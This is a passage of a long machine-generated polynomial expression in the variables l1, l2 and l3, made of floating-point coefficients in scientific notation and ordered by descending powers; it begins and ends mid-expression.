3.69581127210214e+34*l1**16*l2**9*l3**3 - 1.16348791509224e+34*l1**16*l2**9*l3**2 - 1.8691710538488e+31*l1**16*l2**9*l3 - 1.19084615817464e+31*l1**16*l2**9 - 6.01017151684107e+34*l1**16*l2**8*l3**4 - 1.98762435538742e+34*l1**16*l2**8*l3**3 + 1.07702726424595e+32*l1**16*l2**8*l3**2 + 1.86964581261439e+31*l1**16*l2**8*l3 - 2.59509633257318e+29*l1**16*l2**8 - 7.17081093046608e+34*l1**16*l2**7*l3**5 - 2.52727295835584e+34*l1**16*l2**7*l3**4 + 1.18840806113139e+32*l1**16*l2**7*l3**3 + 2.73406289151117e+31*l1**16*l2**7*l3**2 + 3.50064288471573e+29*l1**16*l2**7*l3 + 2.26962136334634e+29*l1**16*l2**7 - 7.52022711044739e+34*l1**16*l2**6*l3**6 - 2.77578971925946e+34*l1**16*l2**6*l3**5 + 2.20663596467307e+32*l1**16*l2**6*l3**4 + 6.16497840532322e+31*l1**16*l2**6*l3**3 + 4.20497844208402e+28*l1**16*l2**6*l3**2 + 2.52492300870819e+29*l1**16*l2**6*l3 + 1.77743519195288e+27*l1**16*l2**6 - 6.59181552696729e+34*l1**16*l2**5*l3**7 - 2.52911698825305e+34*l1**16*l2**5*l3**6 + 2.28701446152795e+32*l1**16*l2**5*l3**5 + 7.0573414869112e+31*l1**16*l2**5*l3**4 + 3.67005325449688e+29*l1**16*l2**5*l3**3 + 3.9818590251551e+29*l1**16*l2**5*l3**2 - 2.71364889976258e+26*l1**16*l2**5*l3 - 1.0982886991344e+27*l1**16*l2**5 - 4.80075776230334e+34*l1**16*l2**4*l3**8 - 1.9495743726303e+34*l1**16*l2**4*l3**7 + 1.9822783828642e+32*l1**16*l2**4*l3**6 + 6.68935497034085e+31*l1**16*l2**4*l3**5 + 2.6879402909597e+29*l1**16*l2**4*l3**4 + 3.82859574736701e+29*l1**16*l2**4*l3**3 - 4.74458704728882e+26*l1**16*l2**4*l3**2 - 1.80275955747254e+27*l1**16*l2**4*l3 - 5.50070834333057e+24*l1**16*l2**4 - 3.0289620865085e+34*l1**16*l2**3*l3**9 - 1.21807919584333e+34*l1**16*l2**3*l3**8 + 1.46460434173054e+32*l1**16*l2**3*l3**7 + 4.54205842623273e+31*l1**16*l2**3*l3**6 + 2.16995248408624e+29*l1**16*l2**3*l3**5 + 3.35915207023801e+29*l1**16*l2**3*l3**4 - 1.65201608769569e+27*l1**16*l2**3*l3**3 - 2.34598716072133e+27*l1**16*l2**3*l3**2 - 3.07960100475065e+24*l1**16*l2**3*l3 + 2.23009033819914e+24*l1**16*l2**3 - 1.38178418542954e+34*l1**16*l2**2*l3**10 - 6.21762904475332e+33*l1**16*l2**2*l3**9 + 5.81562648200818e+31*l1**16*l2**2*l3**8 + 2.45107611110295e+31*l1**16*l2**2*l3**7 + 2.37577985292717e+29*l1**16*l2**2*l3**6 + 2.27403758878651e+29*l1**16*l2**2*l3**5 - 1.80914617414931e+27*l1**16*l2**2*l3**4 - 2.03906661472249e+27*l1**16*l2**2*l3**3 - 1.43754173770993e+24*l1**16*l2**2*l3**2 + 3.43409566150312e+24*l1**16*l2**2*l3 + 6.47017855099965e+21*l1**16*l2**2 - 5.61388504477468e+33*l1**16*l2*l3**11 - 2.09674694843765e+33*l1**16*l2*l3**10 + 3.69990307889862e+31*l1**16*l2*l3**9 + 5.37864518326144e+30*l1**16*l2*l3**8 + 2.62226987170309e+28*l1**16*l2*l3**7 + 1.30954073542372e+29*l1**16*l2*l3**6 - 9.93507131667068e+26*l1**16*l2*l3**5 - 1.24571120268706e+27*l1**16*l2*l3**4 + 2.40142763598385e+23*l1**16*l2*l3**3 + 3.00048455543358e+24*l1**16*l2*l3**2 + 4.692377486827e+21*l1**16*l2*l3 - 1.35760279605154e+21*l1**16*l2 - 1.22369967337954e+33*l1**16*l3**12 - 4.32417969146316e+32*l1**16*l3**11 - 1.98639067528183e+30*l1**16*l3**10 + 1.42780039891597e+30*l1**16*l3**9 + 1.2313464980619e+29*l1**16*l3**8 + 3.36294319107005e+28*l1**16*l3**7 - 8.25299678371084e+26*l1**16*l3**6 - 4.11964748330041e+26*l1**16*l3**5 + 1.21123878547901e+24*l1**16*l3**4 + 1.26702422732512e+24*l1**16*l3**3 + 1.20737047630357e+21*l1**16*l3**2 - 1.10055635924245e+21*l1**16*l3 - 1.32213672997025e+18*l1**16 + 1.8460086542127e+33*l1**15*l2**13 + 7.21783922024019e+33*l1**15*l2**12*l3 + 1.39944105816081e+33*l1**15*l2**12 + 2.8079268530379e+34*l1**15*l2**11*l3**2 + 6.88058028097073e+33*l1**15*l2**11*l3 - 2.17945740077215e+31*l1**15*l2**11 + 4.34038328832625e+34*l1**15*l2**10*l3**3 + 1.18858471222992e+34*l1**15*l2**10*l3**2 + 4.37625011175613e+31*l1**15*l2**10*l3 + 2.18679672041147e+31*l1**15*l2**10 + 7.67115326713554e+34*l1**15*l2**9*l3**4 + 2.24331983972557e+34*l1**15*l2**9*l3**3 - 1.63093110390587e+32*l1**15*l2**9*l3**2 - 2.81442867332051e+31*l1**15*l2**9*l3 + 2.64276720672393e+29*l1**15*l2**9 + 9.29517668260362e+34*l1**15*l2**8*l3**5 + 2.90302778216713e+34*l1**15*l2**8*l3**4 - 1.36073820225475e+32*l1**15*l2**8*l3**3 - 2.29223747097277e+31*l1**15*l2**8*l3**2 - 9.42590601642911e+29*l1**15*l2**8*l3 - 4.07438137156267e+29*l1**15*l2**8 + 1.05535146991839e+35*l1**15*l2**7*l3**6 + 3.44242901527129e+34*l1**15*l2**7*l3**5 - 3.44366175648253e+32*l1**15*l2**7*l3**4 - 8.46903549879888e+31*l1**15*l2**7*l3**3 - 2.69782181547603e+29*l1**15*l2**7*l3**2 - 3.71889084103998e+29*l1**15*l2**7*l3 - 2.33992411267098e+27*l1**15*l2**7 + 9.86027939473587e+34*l1**15*l2**6*l3**7 + 3.38593873354204e+34*l1**15*l2**6*l3**6 - 3.55198882766425e+32*l1**15*l2**6*l3**5 - 9.83910149839485e+31*l1**15*l2**6*l3**4 - 1.19105512130577e+30*l1**15*l2**6*l3**3 - 7.18326612602561e+29*l1**15*l2**6*l3**2 + 3.43857077779657e+27*l1**15*l2**6*l3 + 2.32470975905187e+27*l1**15*l2**6 + 8.18725953297751e+34*l1**15*l2**5*l3**8 + 2.8786056301138e+34*l1**15*l2**5*l3**7 - 3.74411317641495e+32*l1**15*l2**5*l3**6 - 1.0776570960042e+32*l1**15*l2**5*l3**5 - 8.26446822413878e+29*l1**15*l2**5*l3**4 - 6.87004921544265e+29*l1**15*l2**5*l3**3 + 3.93640889255095e+27*l1**15*l2**5*l3**2 + 3.62436063183917e+27*l1**15*l2**5*l3 + 9.58849168743561e+24*l1**15*l2**5 + 5.54177348609953e+34*l1**15*l2**4*l3**9 + 2.10002022643947e+34*l1**15*l2**4*l3**8 - 2.70015585585739e+32*l1**15*l2**4*l3**7 - 8.85780412087391e+31*l1**15*l2**4*l3**6 - 9.30603600048528e+29*l1**15*l2**4*l3**5 - 6.72682147016475e+29*l1**15*l2**4*l3**4 + 7.88348689359663e+27*l1**15*l2**4*l3**3 + 5.36117488018238e+27*l1**15*l2**4*l3**2 - 1.92850889959955e+24*l1**15*l2**4*l3 - 6.29960759335659e+24*l1**15*l2**4 + 3.45105114602827e+34*l1**15*l2**3*l3**10 + 1.23213180308171e+34*l1**15*l2**3*l3**9 - 2.02248454524938e+32*l1**15*l2**3*l3**8 - 5.320245476604e+31*l1**15*l2**3*l3**7 - 5.54677090016183e+29*l1**15*l2**3*l3**6 - 5.36782944862983e+29*l1**15*l2**3*l3**5 + 7.66407470763708e+27*l1**15*l2**3*l3**4 + 5.36369835027056e+27*l1**15*l2**3*l3**3 - 6.44955762199517e+24*l1**15*l2**3*l3**2 - 1.04830150377598e+25*l1**15*l2**3*l3 - 1.70924565781062e+22*l1**15*l2**3 + 1.44756977912376e+34*l1**15*l2**2*l3**11 + 6.25181106236019e+33*l1**15*l2**2*l3**10 - 5.75065427531618e+31*l1**15*l2**2*l3**9 - 2.9070601684794e+31*l1**15*l2**2*l3**8 - 6.27239071847759e+29*l1**15*l2**2*l3**7 - 3.3801855124491e+29*l1**15*l2**2*l3**6 + 6.70214652761159e+27*l1**15*l2**2*l3**5 + 4.13349269618702e+27*l1**15*l2**2*l3**4 - 1.19907591888523e+25*l1**15*l2**2*l3**3 - 1.17482427353852e+25*l1**15*l2**2*l3**2 - 8.07326256003857e+21*l1**15*l2**2*l3 + 6.62583367824559e+21*l1**15*l2**2 + 6.13540866268938e+33*l1**15*l2*l3**12 + 1.91312082275291e+33*l1**15*l2*l3**11 - 4.976507549416e+31*l1**15*l2*l3**10 - 3.10190217362167e+30*l1**15*l2*l3**9 - 6.45913525897565e+28*l1**15*l2*l3**8 - 2.02746867741161e+29*l1**15*l2*l3**7 + 3.00739103093475e+27*l1**15*l2*l3**6 + 2.33287877012379e+27*l1**15*l2*l3**5 - 8.58256224672675e+24*l1**15*l2*l3**4 - 8.17042247205562e+24*l1**15*l2*l3**3 - 1.23249940013237e+21*l1**15*l2*l3**2 + 8.46997738033351e+21*l1**15*l2*l3 + 9.20265727576601e+18*l1**15*l2 + 1.24805049931957e+33*l1**15*l3**13 + 4.1713055696568e+32*l1**15*l3**12 + 6.21685365084666e+30*l1**15*l3**11 - 1.97429042090339e+30*l1**15*l3**10 - 2.4277774962974e+29*l1**15*l3**9 - 4.19155053537558e+28*l1**15*l3**8 + 2.13273343553321e+27*l1**15*l3**7 + 7.09759533859479e+26*l1**15*l3**6 - 6.19344005256957e+24*l1**15*l3**5 - 3.02549129128657e+24*l1**15*l3**4 + 4.12588433480921e+21*l1**15*l3**3 + 4.56946218377285e+21*l1**15*l3**2 + 3.2551555036636e+18*l1**15*l3 - 1.30445623501416e+18*l1**15 - 1.97644003718628e+33*l1**14*l2**14 - 7.23780851282286e+33*l1**14*l2**13*l3 - 1.08267588303603e+33*l1**14*l2**13 - 3.01441367949321e+34*l1**14*l2**12*l3**2 - 6.91682939294377e+33*l1**14*l2**12*l3 + 1.47312828629385e+31*l1**14*l2**12 - 4.22717415824285e+34*l1**14*l2**11*l3**3 - 1.01033757496178e+34*l1**14*l2**11*l3**2 - 7.38450078659631e+31*l1**14*l2**11*l3 - 3.35982335439786e+31*l1**14*l2**11 - 8.38229581764958e+34*l1**14*l2**10*l3**4 - 2.23835245295639e+34*l1**14*l2**10*l3**3 + 2.16465654621234e+32*l1**14*l2**10*l3**2 + 4.15610609220441e+31*l1**14*l2**10*l3 - 1.51788775929882e+29*l1**14*l2**10 - 1.00042925215474e+35*l1**14*l2**9*l3**5 - 2.81656826657993e+34*l1**14*l2**9*l3**4 + 1.01195249635082e+32*l1**14*l2**9*l3**3 + 3.27684588881801e+30*l1**14*l2**9*l3**2 + 1.77165604803025e+30*l1**14*l2**9*l3 + 6.326878648226e+29*l1**14*l2**9 - 1.22751256649185e+35*l1**14*l2**8*l3**6 - 3.6392604666575e+34*l1**14*l2**8*l3**5 + 4.57223073970239e+32*l1**14*l2**8*l3**4 + 1.04781335882185e+32*l1**14*l2**8*l3**3 + 4.88248209321085e+29*l1**14*l2**8*l3**2 + 4.17381273940612e+29*l1**14*l2**8*l3 + 2.16634992165174e+27*l1**14*l2**8 - 1.21609357376792e+35*l1**14*l2**7*l3**7 - 3.75372524930155e+34*l1**14*l2**7*l3**6 + 4.45576487846497e+32*l1**14*l2**7*l3**5 + 1.08026159440589e+32*l1**14*l2**7*l3**4 + 2.53501131625408e+30*l1**14*l2**7*l3**3 + 1.11964303501753e+30*l1**14*l2**7*l3**2 - 9.91723390645807e+27*l1**14*l2**7*l3 - 4.15279443349632e+27*l1**14*l2**7 - 1.07654198872819e+35*l1**14*l2**6*l3**8 - 3.50185775114569e+34*l1**14*l2**6*l3**7 + 5.28087328578506e+32*l1**14*l2**6*l3**6 + 1.43936421735021e+32*l1**14*l2**6*l3**5 + 1.66207464807181e+30*l1**14*l2**6*l3**4 + 9.79132647971895e+29*l1**14*l2**6*l3**3 - 1.04159133318838e+28*l1**14*l2**6*l3**2 - 5.80108535130385e+27*l1**14*l2**6*l3 - 1.20563553037388e+25*l1**14*l2**6 - 8.52107281018506e+34*l1**14*l2**5*l3**9 - 2.77099224310411e+34*l1**14*l2**5*l3**8 + 4.6916640117975e+32*l1**14*l2**5*l3**7 + 1.2547785226603e+32*l1**14*l2**5*l3**6 + 1.961610201333e+30*l1**14*l2**5*l3**5 + 1.10756948383315e+30*l1**14*l2**5*l3**4 - 2.05823259876143e+28*l1**14*l2**5*l3**3 - 9.77944868488226e+27*l1**14*l2**5*l3**2 + 2.29488446740086e+25*l1**14*l2**5*l3 + 1.41657132244664e+25*l1**14*l2**5 - 5.35918620783984e+34*l1**14*l2**4*l3**10 - 1.96059357567462e+34*l1**14*l2**4*l3**9 + 2.96536098045553e+32*l1**14*l2**4*l3**8 + 1.00183050971562e+32*l1**14*l2**4*l3**7 + 1.70347489591746e+30*l1**14*l2**4*l3**6 + 9.10476957216275e+29*l1**14*l2**4*l3**5 - 2.13464904655385e+28*l1**14*l2**4*l3**4 - 1.05067932594415e+28*l1**14*l2**4*l3**3 + 3.59768643220303e+25*l1**14*l2**4*l3**2 + 2.36655477780165e+25*l1**14*l2**4*l3 + 3.05538283413287e+22*l1**14*l2**4 - 3.40200825952267e+34*l1**14*l2**3*l3**11 - 1.06396027435271e+34*l1**14*l2**3*l3**10 + 2.42074400780979e+32*l1**14*l2**3*l3**9 + 4.96630772005438e+31*l1**14*l2**3*l3**8 + 9.1515356095163e+29*l1**14*l2**3*l3**7 + 7.34972724013275e+29*l1**14*l2**3*l3**6 - 1.8724465822578e+28*l1**14*l2**3*l3**5 - 9.60707555407316e+27*l1**14*l2**3*l3**4 + 5.38153406298594e+25*l1**14*l2**3*l3**3 + 3.12915172271658e+25*l1**14*l2**3*l3**2 - 1.17584754359162e+22*l1**14*l2**3*l3 - 2.18895016113291e+22*l1**14*l2**3 - 1.27137610702817e+34*l1**14*l2**2*l3**12 - 5.62348706407467e+33*l1**14*l2**2*l3**11 + 3.49019230562103e+31*l1**14*l2**2*l3**10 + 3.1896643741142e+31*l1**14*l2**2*l3**9 + 1.174004971576e+30*l1**14*l2**2*l3**8 + 4.09337156661975e+29*l1**14*l2**2*l3**7 - 1.47667253589813e+28*l1**14*l2**2*l3**6 - 6.63623275611717e+27*l1**14*l2**2*l3**5 + 5.03533355687353e+25*l1**14*l2**2*l3**4 + 2.74496964497602e+25*l1**14*l2**2*l3**3 - 3.4209485444825e+22*l1**14*l2**2*l3**2 - 3.37190003396965e+22*l1**14*l2**2*l3 - 2.93434155850889e+19*l1**14*l2**2 - 5.86907402789501e+33*l1**14*l2*l3**13 - 1.45415318442869e+33*l1**14*l2*l3**12 + 6.04693136104249e+31*l1**14*l2*l3**11 - 1.7264754877959e+30*l1**14*l2*l3**10 + 5.25519553358044e+28*l1**14*l2*l3**9 + 2.77816087849184e+29*l1**14*l2*l3**8 - 5.67307766842465e+27*l1**14*l2*l3**7 - 3.62011933993708e+27*l1**14*l2*l3**6 + 2.81586672397908e+25*l1**14*l2*l3**5 + 1.69142360453285e+25*l1**14*l2*l3**4 - 3.72663571756877e+22*l1**14*l2*l3**3 - 2.98058300128048e+22*l1**14*l2*l3**2 - 6.95203517494355e+18*l1**14*l2*l3 + 1.08601489187053e+19*l1**14*l2 - 1.09390431944171e+33*l1**14*l3**14 - 3.69446551542808e+32*l1**14*l3**13 - 1.12273062380964e+31*l1**14*l3**12 + 2.84916652739516e+30*l1**14*l3**11 + 3.84905243167115e+29*l1**14*l3**10 + 3.89907213841282e+28*l1**14*l3**9 - 4.12620163401872e+27*l1**14*l3**8 - 1.00375338113644e+27*l1**14*l3**7 + 1.71167407745633e+25*l1**14*l3**6 + 5.69362666479402e+24*l1**14*l3**5 - 2.76755340414948e+22*l1**14*l3**4 - 1.29120342479293e+22*l1**14*l3**3 + 8.08466666501817e+18*l1**14*l3**2 + 8.70669460650702e+18*l1**14*l3 + 3.69259800664416e+15*l1**14 + 1.70371987278699e+33*l1**13*l2**15 + 6.27861110487279e+33*l1**13*l2**14*l3 + 6.24637301410453e+32*l1**13*l2**14 + 2.80895156648438e+34*l1**13*l2**13*l3**2 + 6.41254014275803e+33*l1**13*l2**13*l3 - 6.17157768737508e+29*l1**13*l2**13 + 3.39209478790915e+34*l1**13*l2**12*l3**3 + 6.73629482267921e+33*l1**13*l2**12*l3**2 + 9.57780609061998e+31*l1**13*l2**12*l3 + 4.40989454990626e+31*l1**13*l2**12 + 7.98614311359468e+34*l1**13*l2**11*l3**4 + 2.02039075408329e+34*l1**13*l2**11*l3**3 - 2.53793564952294e+32*l1**13*l2**11*l3**2 - 5.88120763730511e+31*l1**13*l2**11*l3 - 9.02374420548125e+28*l1**13*l2**11 + 8.93845878833494e+34*l1**13*l2**10*l3**5 + 2.2781590116183e+34*l1**13*l2**10*l3**4 - 7.28777541296572e+30*l1**13*l2**10*l3**3 + 3.25389935974722e+31*l1**13*l2**10*l3**2 - 2.58428287094177e+30*l1**13*l2**10*l3 - 8.55290639484457e+29*l1**13*l2**10 + 1.21459991510381e+35*l1**13*l2**9*l3**6 + 3.33007312318719e+34*l1**13*l2**9*l3**5 - 5.42222700978247e+32*l1**13*l2**9*l3**4 - 1.23755259472725e+32*l1**13*l2**9*l3**3 - 4.95923690408978e+29*l1**13*l2**9*l3**2 - 3.04723712671824e+29*l1**13*l2**9*l3 - 7.83415789629145e+26*l1**13*l2**9 + 1.2263964869696e+35*l1**13*l2**8*l3**7 + 3.49649807075338e+34*l1**13*l2**8*l3**6 - 4.21937534387845e+32*l1**13*l2**8*l3**5 - 8.82853417740149e+31*l1**13*l2**8*l3**4 - 4.23608104018497e+30*l1**13*l2**8*l3**3 - 1.55041221056108e+30*l1**13*l2**8*l3**2 + 1.90142505509005e+28*l1**13*l2**8*l3 + 6.34386110210437e+27*l1**13*l2**8 + 1.19438832574563e+35*l1**13*l2**7*l3**8 + 3.51145270345639e+34*l1**13*l2**7*l3**7 - 6.56224758674951e+32*l1**13*l2**7*l3**6 - 1.61216699595226e+32*l1**13*l2**7*l3**5 - 2.21799130749538e+30*l1**13*l2**7*l3**4 - 1.09056826858562e+30*l1**13*l2**7*l3**3 + 1.7991079315316e+28*l1**13*l2**7*l3**2 + 7.38823325211347e+27*l1**13*l2**7*l3 + 8.92375394479665e+24*l1**13*l2**7 + 9.7200254014396e+34*l1**13*l2**6*l3**9 + 3.05572994898061e+34*l1**13*l2**6*l3**8 - 5.40678947231857e+32*l1**13*l2**6*l3**7 - 1.47765501187285e+32*l1**13*l2**6*l3**6 - 3.57324758127659e+30*l1**13*l2**6*l3**5 - 1.51846979787681e+30*l1**13*l2**6*l3**4 + 3.94034795391202e+28*l1**13*l2**6*l3**3 + 1.47487810767298e+28*l1**13*l2**6*l3**2 - 6.81044779849898e+25*l1**13*l2**6*l3 - 2.61640761935635e+25*l1**13*l2**6 + 7.61300607928969e+34*l1**13*l2**5*l3**10 + 2.27327907884153e+34*l1**13*l2**5*l3**9 - 5.1911495885504e+32*l1**13*l2**5*l3**8 - 1.24299560657244e+32*l1**13*l2**5*l3**7 - 2.42498821881224e+30*l1**13*l2**5*l3**6 - 1.27903079728065e+30*l1**13*l2**5*l3**5 + 3.9832696719066e+28*l1**13*l2**5*l3**4 + 1.61398650426576e+28*l1**13*l2**5*l3**3 - 9.41135720335875e+25*l1**13*l2**5*l3**2 - 4.13355279811491e+25*l1**13*l2**5*l3 - 3.42246818321612e+22*l1**13*l2**5 + 4.33498663243643e+34*l1**13*l2**4*l3**11 + 1.6081914665237e+34*l1**13*l2**4*l3**10 - 2.45202000402842e+32*l1**13*l2**4*l3**9 - 9.76331137894563e+31*l1**13*l2**4*l3**8 - 2.68299366960786e+30*l1**13*l2**4*l3**7 - 1.05858723577077e+30*l1**13*l2**4*l3**6 + 4.20694033907392e+28*l1**13*l2**4*l3**5 + 1.6598945104723e+28*l1**13*l2**4*l3**4 - 1.49525001209591e+26*l1**13*l2**4*l3**3 - 6.2320014493243e+25*l1**13*l2**4*l3**2 + 1.04571159966584e+23*l1**13*l2**4*l3 + 5.41802021376568e+22*l1**13*l2**4 + 2.95142207049174e+34*l1**13*l2**3*l3**12 + 7.69334361349383e+33*l1**13*l2**3*l3**11 - 2.63397481350737e+32*l1**13*l2**3*l3**10 - 3.38611806277542e+31*l1**13*l2**3*l3**9 - 9.80887276992704e+29*l1**13*l2**3*l3**8 - 8.6503845615754e+29*l1**13*l2**3*l3**7 + 3.07782129562185e+28*l1**13*l2**3*l3**6 + 1.36206554676264e+28*l1**13*l2**3*l3**5 - 1.43718237221222e+26*l1**13*l2**3*l3**4 - 6.2933727735783e+25*l1**13*l2**3*l3**3 + 1.72274388144847e+23*l1**13*l2**3*l3**2 + 8.97322140079802e+22*l1**13*l2**3*l3 + 5.15496426702566e+19*l1**13*l2**3 + 9.25892201799613e+33*l1**13*l2**2*l3**13 + 4.63739900471366e+33*l1**13*l2**2*l3**12 + 6.50780675182871e+30*l1**13*l2**2*l3**11 - 3.44969470492726e+31*l1**13*l2**2*l3**10 - 1.78960131019427e+30*l1**13*l2**2*l3**9 - 3.91950603099378e+29*l1**13*l2**2*l3**8 + 2.46039455117675e+28*l1**13*l2**2*l3**7 + 8.67421536379352e+27*l1**13*l2**2*l3**6 - 1.19923252956157e+26*l1**13*l2**2*l3**5 - 4.88736417723235e+25*l1**13*l2**2*l3**4 + 2.12780280299682e+23*l1**13*l2**2*l3**3 + 1.01434681365905e+23*l1**13*l2**2*l3**2 - 5.58460298438402e+19*l1**13*l2**2*l3 - 4.68007380036471e+19*l1**13*l2**2 + 4.95235427340378e+33*l1**13*l2*l3**14 + 8.52565120967254e+32*l1**13*l2*l3**13 - 6.69268866542506e+31*l1**13*l2*l3**12 + 8.4695046297898e+30*l1**13*l2*l3**11 + 5.43087079991112e+28*l1**13*l2*l3**10 - 3.45058224854424e+29*l1**13*l2*l3**9 + 7.74514240269792e+27*l1**13*l2*l3**8 + 4.761891433076e+27*l1**13*l2*l3**7 - 5.6629588371893e+25*l1**13*l2*l3**6 - 2.78104042179903e+25*l1**13*l2*l3**5 + 1.43160030769209e+23*l1**13*l2*l3**4 + 7.14707524824856e+22*l1**13*l2*l3**3 - 9.02917534468221e+19*l1**13*l2*l3**2 - 5.84406088545801e+19*l1**13*l2*l3 - 1.72766654118567e+16*l1**13*l2 + 8.27953321208583e+32*l1**13*l3**15 + 3.08549042902291e+32*l1**13*l3**14 + 1.51725930412119e+31*l1**13*l3**13 - 4.02981966777684e+30*l1**13*l3**12 - 5.06986972304937e+29*l1**13*l3**11 - 2.0081187452337e+28*l1**13*l3**10 + 6.41821041399177e+27*l1**13*l3**9 + 1.16133198785428e+27*l1**13*l3**8 - 3.43816941768126e+25*l1**13*l3**7 - 8.65006151485434e+24*l1**13*l3**6 + 8.52920648251851e+22*l1**13*l3**5 + 2.73244317471311e+22*l1**13*l3**4 - 7.81346551061643e+19*l1**13*l3**3 - 3.1726557818259e+19*l1**13*l3**2 + 1.19946817897086e+16*l1**13*l3 + 6.9621582706305e+15*l1**13 - 1.15064719555944e+33*l1**12*l2**16 - 4.87914531224948e+33*l1**12*l2**15*l3 - 1.71171314245447e+32*l1**12*l2**15 - 2.27264330219826e+34*l1**12*l2**14*l3**2 - 5.55271520465418e+33*l1**12*l2**14*l3 - 1.63480489846314e+31*l1**12*l2**14 - 2.19145571013999e+34*l1**12*l2**13*l3**3 - 2.81250449534795e+33*l1**12*l2**13*l3**2 - 9.64717755307173e+31*l1**12*l2**13*l3 - 5.00051268463716e+31*l1**12*l2**13 - 6.73592557248902e+34*l1**12*l2**12*l3**4 - 1.70030914184355e+34*l1**12*l2**12*l3**3 + 2.6044367010942e+32*l1**12*l2**12*l3**2 + 7.67803575150169e+31*l1**12*l2**12*l3 + 4.07373799547042e+29*l1**12*l2**12 - 6.55154075502592e+34*l1**12*l2**11*l3**5 - 1.46534252524007e+34*l1**12*l2**11*l3**4 - 1.1623289601167e+32*l1**12*l2**11*l3**3 - 7.84036486652692e+31*l1**12*l2**11*l3**2 + 3.02040459850163e+30*l1**12*l2**11*l3 + 1.01037051695304e+30*l1**12*l2**11 - 1.03549025179331e+35*l1**12*l2**10*l3**6 - 2.69945987467944e+34*l1**12*l2**10*l3**5 + 5.87455299985801e+32*l1**12*l2**10*l3**4 + 1.46477739516941e+32*l1**12*l2**10*l3**3 + 2.01288792077727e+29*l1**12*l2**10*l3**2 + 4.70262681455506e+27*l1**12*l2**10*l3 - 1.7782982741217e+27*l1**12*l2**10 - 1.03508602000615e+35*l1**12*l2**9*l3**7 - 2.71605864243985e+34*l1**12*l2**9*l3**6 + 2.82882081897178e+32*l1**12*l2**9*l3**5 + 3.60102444940035e+31*l1**12*l2**9*l3**4 + 5.82735334772221e+30*l1**12*l2**9*l3**3 + 1.95719099829408e+30*l1**12*l2**9*l3**2 - 2.77444405161669e+28*l1**12*l2**9*l3 - 8.35677427838442e+27*l1**12*l2**9 - 1.07854093712625e+35*l1**12*l2**8*l3**8 - 3.00142101969076e+34*l1**12*l2**8*l3**7 + 6.729009222426e+32*l1**12*l2**8*l3**6 + 1.64723448523233e+32*l1**12*l2**8*l3**5 + 2.06718487747462e+30*l1**12*l2**8*l3**4 + 8.46879917549081e+29*l1**12*l2**8*l3**3 - 2.29400656644255e+28*l1**12*l2**8*l3**2 - 7.25922582189705e+27*l1**12*l2**8*l3 + 2.68515638718719e+24*l1**12*l2**8 - 9.66871905922266e+34*l1**12*l2**7*l3**9 - 2.70468962342587e+34*l1**12*l2**7*l3**8 + 5.73170244905123e+32*l1**12*l2**7*l3**7 + 1.29671584425345e+32*l1**12*l2**7*l3**6 + 4.92673097926871e+30*l1**12*l2**7*l3**5 + 1.85058703780509e+30*l1**12*l2**7*l3**4 - 5.89803082637887e+28*l1**12*l2**7*l3**3 - 1.89866128511493e+28*l1**12*l2**7*l3**2 + 1.32345969069485e+26*l1**12*l2**7*l3 + 4.04754032174008e+25*l1**12*l2**7 - 7.40805278950946e+34*l1**12*l2**6*l3**10 - 2.31018466364076e+34*l1**12*l2**6*l3**9 + 4.97704375490416e+32*l1**12*l2**6*l3**8 + 1.44750060636756e+32*l1**12*l2**6*l3**7 + 3.50218319645532e+30*l1**12*l2**6*l3**6 + 1.35719962155258e+30*l1**12*l2**6*l3**5 - 5.75279157290892e+28*l1**12*l2**6*l3**4 - 1.96092880131473e+28*l1**12*l2**6*l3**3 + 1.68818775140969e+26*l1**12*l2**6*l3**2 + 5.68051679945201e+25*l1**12*l2**6*l3 + 8.75536860050862e+21*l1**12*l2**6 - 5.9074341505248e+34*l1**12*l2**5*l3**11 - 1.56915200430954e+34*l1**12*l2**5*l3**10 + 4.87232942530673e+32*l1**12*l2**5*l3**9 + 9.34242405904551e+31*l1**12*l2**5*l3**8 + 2.84837706898054e+30*l1**12*l2**5*l3**7 + 1.4140337725555e+30*l1**12*l2**5*l3**6 - 6.52523517532198e+28*l1**12*l2**5*l3**5 - 2.30406293689164e+28*l1**12*l2**5*l3**4 + 2.88555546072294e+26*l1**12*l2**5*l3**3 + 9.82654278939087e+25*l1**12*l2**5*l3**2 - 3.13451472769245e+23*l1**12*l2**5*l3 - 1.05876018747643e+23*l1**12*l2**5 - 2.89443740238344e+34*l1**12*l2**4*l3**12 - 1.18733900393276e+34*l1**12*l2**4*l3**11 + 1.34561631207296e+32*l1**12*l2**4*l3**10 + 8.91232529234061e+31*l1**12*l2**4*l3**9 + 3.3762320452669e+30*l1**12*l2**4*l3**8 + 9.55923600320355e+29*l1**12*l2**4*l3**7 - 5.91252230004336e+28*l1**12*l2**4*l3**6 - 2.01166279033635e+28*l1**12*l2**4*l3**5 + 3.0239129297559e+26*l1**12*l2**4*l3**4 + 1.06277682980872e+26*l1**12*l2**4*l3**3 - 4.79292304697422e+23*l1**12*l2**4*l3**2 - 1.74962534051322e+23*l1**12*l2**4*l3 - 2.8664660961022e+19*l1**12*l2**4 - 2.28526999291269e+34*l1**12*l2**3*l3**13 - 4.37665890150911e+33*l1**12*l2**3*l3**12 + 2.67429299125017e+32*l1**12*l2**3*l3**11 + 8.37023364671806e+30*l1**12*l2**3*l3**10 + 6.03493817830709e+29*l1**12*l2**3*l3**9 + 9.27725691095825e+29*l1**12*l2**3*l3**8 - 3.87073489288705e+28*l1**12*l2**3*l3**7 - 1.61003349109482e+28*l1**12*l2**3*l3**6 + 2.62763625275269e+26*l1**12*l2**3*l3**5 + 9.82569321604229e+25*l1**12*l2**3*l3**4 - 6.25986660029388e+23*l1**12*l2**3*l3**3 - 2.33334322949226e+23*l1**12*l2**3*l3**2 + 3.47899648764347e+20*l1**12*l2**3*l3 + 1.35507953945039e+20*l1**12*l2**3 - 5.42789703031354e+33*l1**12*l2**2*l3**14 - 3.62740079667309e+33*l1**12*l2**2*l3**13 - 5.25261552926854e+31*l1**12*l2**2*l3**12 + 3.84863282454899e+31*l1**12*l2**2*l3**11 + 2.31670620731107e+30*l1**12*l2**2*l3**10 + 2.56908974111604e+29*l1**12*l2**2*l3**9 - 3.31404169173995e+28*l1**12*l2**2*l3**8 - 9.20911357092443e+27*l1**12*l2**2*l3**7 + 2.04137801336026e+26*l1**12*l2**2*l3**6 + 6.81173093117874e+25*l1**12*l2**2*l3**5 - 5.65739187568087e+23*l1**12*l2**2*l3**4 - 2.06215962969696e+23*l1**12*l2**2*l3**3 + 5.14102161546095e+20*l1**12*l2**2*l3**2 + 2.01885732212296e+20*l1**12*l2**2*l3 + 1.18827609314568e+16*l1**12*l2**2 - 3.68986187669315e+33*l1**12*l2*l3**15 - 